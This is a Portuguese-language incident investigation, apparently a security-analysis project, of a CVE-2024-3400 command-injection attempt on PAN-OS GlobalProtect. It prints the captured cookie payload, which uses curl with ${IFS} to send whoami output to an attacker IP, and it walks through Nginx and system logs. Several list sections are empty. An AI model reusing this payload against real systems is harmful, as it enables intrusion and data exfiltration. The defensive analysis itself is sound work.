
Investigação de uma tentativa de injeção de comando PAN-OS CVE-2024-3400, analisando a entrega do payload, o processamento interno e a validação da execução com base em evidências de log.
Este projeto documenta a investigação de uma tentativa de injeção de comando CVE-2024-3400 direcionada ao serviço PAN-OS GlobalProtect.
O objetivo era determinar:
Um alerta crítico foi disparado indicando uma possível tentativa de exploração.

A requisição contém um cookie manipulado:
SESSID=... curl${IFS}144.172.79.92:4444?user=$(whoami)

${IFS} contorna a filtragem de espaçoswhoami tenta obter a identidade do sistemacurl tenta comunicação externaIsto é um payload de injeção de comando
Os logs do Nginx confirmam que a requisição chegou ao servidor:
POST /global-protect/login.esp
HTTP 200
User-Agent: curl

A requisição maliciosa foi aceita e processada.
Logs do sistema mostram que o payload alcançou a lógica interna:

dt_curl)No entanto:
a consulta DNS falhou → a comunicação externa não ocorreu
O IP atacante:

Isso confirma a origem externa do ataque.
Vários IPs interagiram com o sistema antes do ataque:

Apenas 144.172.79.92 está diretamente associado à exploração.
Esta foi uma tentativa real de injeção de comando.
O atacante conseguiu:
No entanto:
não há execução confirmada nem comprometimento do sistema
Tentativa de Injeção de Comando
Payload Processado - Sem Execução ou Impacto Confirmado